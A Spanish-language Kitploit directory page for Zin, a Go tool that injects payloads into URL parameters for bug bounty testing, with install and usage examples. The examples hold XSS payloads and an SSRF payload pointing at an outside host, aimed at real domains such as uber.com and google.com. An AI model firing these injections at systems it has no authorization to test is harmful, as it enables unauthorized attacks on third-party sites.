Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Zin — Un inyector de payloads para bugbounties escrito en Go | Kitploit
Herramientas/GitHubGitHub/ethicalhackingplayground/zin
Explotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubethicalhackingplayground/zin

Zin

Un inyector de payloads para bugbounties escrito en Go

Ver Repositorio
7026hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

alt text

Versión 1.0

😎 Zin 😎

Un inyector de payloads para bug bounties escrito en Go

Image from Gyazo

Características

  • Inyectar múltiples payloads en todos los parámetros
  • Inyectar payloads individuales en todos los parámetros
  • Guarda las respuestas en una carpeta de salida
  • Muestra el código de estado y la longitud de la respuesta
  • Puede buscar patrones en la respuesta (grep)
  • Muy rápido
  • Fácil de configurar

Instalación

$ go get -u github.com/ethicalhackingplayground/Zin

Nuevas Funciones

-✅ Coincidencia de patrones en las respuestas

-✅ Coincidencia de códigos de estado

Argumentos

root@kitploit:~
      _
     (_)
  _____ _ __
 |_  / | '_ \
  / /| | | | |
 /___|_|_| |_|


Que lleguen las recompensas


  -c int
        the concurrency (default 20)
  -g string
        grep the response for any matches
  -p string
        the payload to be used
  -pL string
        the list of payloads to be used
  -s int
        filter by status codes (default 200)
        

Ejemplo SSRF

$ subfinder uber.com | gau | grep "=http" | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g "SUP3R_S3cret_1337_K3y"

Ejemplo XSS

$ subfinder uber.com | gau| Zin -c 80 -p '"><script>alert(matchforthis)script>' -g "matchforthis"

Inyectar Múltiples Payloads

$ cat hosts | gau | grep "&" | Zin -c 80 -pL <payloadfile>

Escaneo de Subdominios

$ subfinder -dL domains --silent | gau | Zin -c 80 -p <payload>

Probar Solo Parámetros

$ echo "google.com" | gau | grep "&" | Zin -c 80 -p '"><script>alert(matchthis)</script<"' -g "matchthis"

Múltiples Hosts

$ cat hosts | gau | Zin -c 80 -p <payload>

Si obtienes un bounty, apoya comprándome un café


Buy Me A Coffee
Descargar herramienta